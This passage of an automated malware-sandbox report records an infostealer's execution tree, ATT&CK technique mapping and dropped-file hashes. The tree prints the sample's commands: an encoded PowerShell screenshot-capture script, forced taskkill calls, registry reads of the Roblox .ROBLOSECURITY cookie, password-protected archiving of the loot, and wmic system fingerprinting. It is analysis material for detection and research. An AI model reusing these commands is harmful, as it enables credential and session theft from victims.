AAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:7892
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6624
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vv5tv2lo\vv5tv2lo.cmdline"
        6⤵
        
        PID:7236
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFADB.tmp" "c:\Users\Admin\AppData\Local\Temp\vv5tv2lo\CSCEE307CA1BDB741A19B9D2732A1DEE5BC.TMP"
        7⤵
        
        PID:8152
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "Camera.exe /devlist"
      4⤵
      PID:7664
    - - C:\Users\Admin\AppData\Local\Temp\_MEI55642\Camera.exe
        
        Camera.exe /devlist
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5172
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4936"
      4⤵
      PID:7620
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4936
        5⤵
        Kills process with taskkill
        
        PID:7736
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2468"
      4⤵
      PID:4412
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2468
        5⤵
        Kills process with taskkill
        
        PID:5532
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2360"
      4⤵
      PID:7440
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2360
        5⤵
        Kills process with taskkill
        
        PID:7120
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3428"
      4⤵
      PID:4904
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3428
        5⤵
        Kills process with taskkill
        
        PID:1408
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 408"
      4⤵
      PID:5760
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 408
        5⤵
        Kills process with taskkill
        
        PID:5680
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 912"
      4⤵
      PID:7084
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 912
        5⤵
        Kills process with taskkill
        
        PID:7916
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2724"
      4⤵
      PID:3568
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2724
        5⤵
        Kills process with taskkill
        
        PID:7608
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 540"
      4⤵
      PID:5128
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 540
        5⤵
        Kills process with taskkill
        
        PID:8012
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 776"
      4⤵
      PID:7876
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 776
        5⤵
        Kills process with taskkill
        
        PID:7036
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2560"
      4⤵
      PID:7188
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2560
        5⤵
        Kills process with taskkill
        
        PID:5472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:6348
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6988
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:5236
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        
        PID:6512
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI55642\rar.exe a -r -hpblank "C:\Users\Admin\AppData\Local\Temp\bI5S6.zip" *"
      4⤵
      PID:7336
    - - C:\Users\Admin\AppData\Local\Temp\_MEI55642\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI55642\rar.exe a -r -hpblank "C:\Users\Admin\AppData\Local\Temp\bI5S6.zip" *
        5⤵
        Executes dropped EXE
        
        PID:6424
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:3316
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:6040
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:5504
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:5752
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:5428
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:6516

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1036

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4900

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e55832d7cd7e868a2c087c4c73678018

SHA1
ed7a2f6d6437e907218ffba9128802eaf414a0eb

SHA256
a4d7777b980ec53de3a70aca8fb25b77e9b53187e7d2f0fa1a729ee9a35da574

SHA512
897fdebf1a9269a1bf1e3a791f6ee9ab7c24c9d75eeff65ac9599764e1c8585784e1837ba5321d90af0b004af121b2206081a6fb1b1ad571a0051ee33d3f5c5f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
c2d9eeb3fdd75834f0ac3f9767de8d6f

SHA1
4d16a7e82190f8490a00008bd53d85fb92e379b0

SHA256
1e5efb5f1d78a4cc269cb116307e9d767fc5ad8a18e6cf95c81c61d7b1da5c66

SHA512
d92f995f9e096ecc0a7b8b4aca336aeef0e7b919fe7fe008169f0b87da84d018971ba5728141557d42a0fc562a25191bd85e0d7354c401b09e8b62cdc44b6dcd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\44941fe9-3916-4756-921e-da7ceea5708a.tmp

Filesize
6KB

MD5
54af1e6f591833029c339af7e829c8bc

SHA1
1f44188bad4235ba310f64f1d2a5142697f7be19

SHA256
3ef9f55733541e4f0025eac13cb2166501f53825833a755e78062c56282444f3

SHA512
a2dacf2fac08803b2f12aeaaf744cece81eedfafe7fa12e8bf2397cc38f9f70f31600ef776f9562f7192d881b8deae6ef5ae7d75508c71d22659f3f994bc8f48

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
847b5261e86933df460ef35801ff6ab4

SHA1
3f665b1e9e2c160398a9d81aba879c77b90dcfd4

SHA256
12202543c77cbb006f51e60e5b59e5b276775e782440a3f3ced27fe825e6d80f

SHA512
17ca0d8f93289b0fe7621a66c574c7cb4aa88511065532a940e83f0fe919f2bfc0e42ca14bfbfe8e61775f7f9dcd45557dcdc5f8cffed43fbd538c6f0c1bc0ab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
22ef30caba9bbeca8c4d9ce3f2554204

SHA1
0b17d8c909f9927eec8b1134bf6e9eac50db2007

SHA256
6a8498874750906ae1e22b5ae1481b170dd6aa6b37e2b18ac6491c7ae12e0d4d

SHA512
dc99657c27b518f93062c79f0fb4cf1cc47f5220cc2e09e73011c72d3eecde35beebc6ae954da58e110146f8321be58bdc6c668a9b6507fe51ff311085fb5293

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
8b08ea8b4ecff3a10ea6425a08ccfd88

SHA1
e4529bd710aaebd078285d83d964e29a14986817

SHA256
c1442c71326b86724e582a7cf6b4775dbc70fd2433ba5d90e826f4d13bb34f98

SHA512
2bf5696f06e229e488645a0648e347c3b32f6bcac2eb4415961b532d489d644a2f26cea58b6ff4f71407a25a3fa0a6a42776ac688499f851b9aa979b69542865

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
80f30107ad9215bead7e96f6ae4f9466

SHA1
7f684668d8982da3916d3b1244fdfde6c5482f1a

SHA256
21dac66cac250a320222c45ec7fdab0ff9440212d0668f16618f4558f9d59641

SHA512
38efd569b06701a3e1c66e7d233ca5d057409eff03babbc1fe72406d7ccd3f24b3ba276cdf36ce99a52613d3b14996a08bfcf3f35e126129c8a142a4bc228d40

Download Submit
C:\Users\Admin\AppData\Local\Temp\EN4LmOp7VH.tmp

Filesize
124KB

MD5
472c5775094ecff543f2e2442106de26

SHA1
e33f29a9c135b061f8a55b3ab4e9b390f8217df2

SHA256
ede918392a9891a24445932f019f20d16de6b661484997a268b0cf96cdccd9ed

SHA512
b77876adf4171d2364dff070d9725ac736ddade64bb198d5adb368f8aabc781e67da81ffb804738e0a5daaef7cebba3f97dac73d7743c28308bd1de7b73db83e

Download Submit
C:\Users\Admin\AppData\Local\Temp\SSqtj9YYHv.tmp

Filesize
20KB

MD5
f77c672599f7361cd7e088406dcdb5dc

SHA1
68c97426153e5b8c7a7c9850b6bee4cfef981f37

SHA256
9b98274fa2832fe0122682c12c4abacf5eb88f428ea6d53ffa4fa5c7e968fffc

SHA512
8e29762cc327651aaf75f9d160041ad50935e29fb1e029a6d0f2e17692cc03550187baa98d4cb4ec9c0af7ce7041b210942e41cde8e68edff95be547521955f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\WwzcxCnFOl.tmp

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40682\VCRUNTIME140.dll

Filesize
106KB

MD5
870fea4e961e2fbd00110d3783e529be

SHA1
a948e65c6f73d7da4ffde4e8533c098a00cc7311

SHA256
76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

SHA512
0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40682\_bz2.pyd

Filesize
46KB

MD5
13f9af35bc2ca51e1a0d9f912280832b

SHA1
3b94ed1baa8c1dd1cc9ba73800127367f28177e6

SHA256
5cfa3e2d465614a5f7bdbfe8bbbae012d075bbe83d9561da3f93f4c19f9b94b3

SHA512
0234136e9944963d672bb45abb76540a3ca82dcbc16d6f6185195316f2280253f02173840ccee8db7601f08b08c753b4d46a206e5d2ffbaa40b62e7599e1c3d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40682\_ctypes.pyd

Filesize
56KB

MD5
34bc30cb64fb692589e6df7cf62f14af

SHA1
e42884b73090ee37ead7743f161491f04500cdb7

SHA256
5d5c80b2e8a1cf081aa41c35c48f73df384cf526f358e91f80ba2ad48b6e52f7

SHA512
69a6bb5689f33bfa13e5ef9532632a82cd26983d73e2d9ad920588840d7636c86f224553d3cc988e7500bbee9d67d15deb3382af03675e97043cd59707924c2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40682\_hashlib.pyd

Filesize
33KB

MD5
47552c83d1890ff91037eecd02b730a2

SHA1
e9ab5c304f0a2817eba6fdc758722600615c30be

SHA256
c3024b95f7f1757d9496c8171eaca5f8b9bb8c7cd7f6077077b5aaa1302b0ca4

SHA512
d9d42b253fddca0eff99ff47ef5ff05a8ef53966c79e040ebe22757b31d478f71709460a36c8dbde67a43bd992983d3e4ae7775e9d687295763ffd283d0746d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40682\_lzma.pyd

Filesize
84KB

MD5
73eb1d56265f92ceef7948c5b74a11c1

SHA1
a1d60de9930fd9ed9be920c4d650d42fe07ebc22

SHA256
ee390c28c14e0c33a5601f12eb5d04bdff0ecfb334ce402f4380b8e0ebf7d4de

SHA512
ebc9bc622ad7ef27b16b85db2be7b1f68f2b5de9de5eb2684b5fb3a02e9e851a939f63459cc2eb911263e799ff2c4a918ae98141f61132eb3d110828741f833f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40682\_queue.pyd

Filesize
24KB

MD5
d301ac14f79443990a227ec0aee1788c

SHA1
e6ba16b0ec6ac2ed63e3c2424bf92d4fe66405f9

SHA256
890d3522062a81f970a2c91acea9c68b91c9d77013afc34d5a950269b9e994b6

SHA512
2c2a3dda038309590965a6a2cb1ff86b6ba8a2fe9e97511c1e2a2cc63fda96ac7782b5eedfcf61479838249a064482b11657c0f4a6c3ed1f6338ebe0e0171ec1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40682\_socket.pyd

Filesize
41KB

MD5
26a6147d9ffd545fd80c9ed664d66d06

SHA1
b17b5ec05c012210adb7f0408273d0a40ae4f755

SHA256
35f18dd2452642cefb6f883afc74d560e22aa71bdb6b26e63b076d7ea4246d38

SHA512
447c72662de5fcffa07da8682e4d08f8ced791bfba9a742529766527e5d41ccfef5fa694c8a88bb8798c53c9fc48c33f57dd6c74b5dc49e8f8b15832593e155c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40682\_sqlite3.pyd

Filesize
48KB

MD5
c528dc5f5e7d87c63f09f31d8e2e8b7a

SHA1
6d09a5c9266876d8e466059fa3c0ef6f71f59a74

SHA256
2ea4fe9500ee3669ac29a7451ee775b3bc7e2104fe9e840af563499e23867a46

SHA512
358fb50590b958dca4138b12f31f5b053b5c2a251958b68662390ddd761f02185b283f23801a2cc0a15f12dc0f7ec9a4213228af27e9988889ccb7d3727b9c6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40682\_ssl.pyd

Filesize
60KB

MD5
d3b40bb8131722d77dab6fd9bd135fca

SHA1
170143f91ebf1f1a41da05725f3d659d070e969e

SHA256
e33e96ee3e4135b92cbdb987337d3cf8e438f1cca96c87dec682b586b6807ce9

SHA512
b48730d8dd5c0dd43b300b3fc997b6a083d9d4c45816bbcf15428cd2ee8664b49bbfd9e645d9e27d707b243bfe061d12822accbe466822ba723fc23c13e41f69

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40682\base_library.zip

Filesize
1.0MB

MD5
38cc368b069b66d701a06514516c1ecc

SHA1
3772ec88260a712788a5eefac9d1c370b713f25c

SHA256
d40998a50627ea89e5043a3ad5025d90db3e391a2828c668dca43685ef4224fa

SHA512
5c98eed9e5297bdc35976b69815abf9c2352195ec697e496672ed1194f03a64149cc262f80402f51f63d3ff922f99389e74b97c00da58cddd5e508836e2c026b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40682\libcrypto-1_1.dll

Filesize
1.1MB

MD5
c702b01b9d16f58ad711bf53c0c73203

SHA1
dc6bb8e20c3e243cc342bbbd6605d3ae2ae8ae5b

SHA256
49363cba6a25b49a29c6add58258e9feb1c9531460f2716d463ab364d15120e1

SHA512
603d710eb21e2844739edcc9b6d2b0d7193cdbc9b9efe87c748c17fdc88fa66bc3fdae2dca83a42a17d91c4fdf571f93f5cc7cd15004f7cb0695d0130813aa7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40682\libffi-7.dll

Filesize
23KB

MD5
ce7d4f152de90a24b0069e3c95fa2b58

SHA1
98e921d9dd396b86ae785d9f8d66f1dc612111c2

SHA256
